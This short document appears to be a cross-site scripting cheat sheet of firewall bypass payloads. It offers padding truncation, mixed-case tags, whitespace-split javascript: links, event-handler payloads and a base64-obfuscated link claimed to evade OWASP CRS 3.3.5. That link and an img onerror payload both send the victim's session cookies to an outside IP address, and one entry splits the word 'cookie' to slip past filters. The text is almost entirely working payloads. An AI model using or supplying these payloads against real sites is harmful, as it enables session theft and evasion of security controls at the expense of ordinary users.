XSS WAF Bypass
1) XSS Truncation
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<script>alert(1)</script>2) OWASP CRS 3.3.5 Bypass
<a href=ja
vascript:\u0065val(\u0061tob("ZmV0Y2goJ2h0dHA6Ly8xMC4yMDEuODIuMTc3OjgwMDAvJytlbmNvZGVVUklDb21wb25lbnQoZG9jdW1lbnQuY29va2llKSk="))>Click Here</a>3) Mixed-Case Format
<scrIpT>aLerT(1)</scrIpT><ImG src=x onerror=this.src="http://<ip>/?c="+document["co"+"okie"]>4) White Space and Delimiters
<a/href=j
avascript:a
lert(1)>aaa</a>5) HTML Entity Encoding
<body onload=alert(1)>5) Steal cookie by not directly using sensitive words in JS like "cookie" for example
Last updated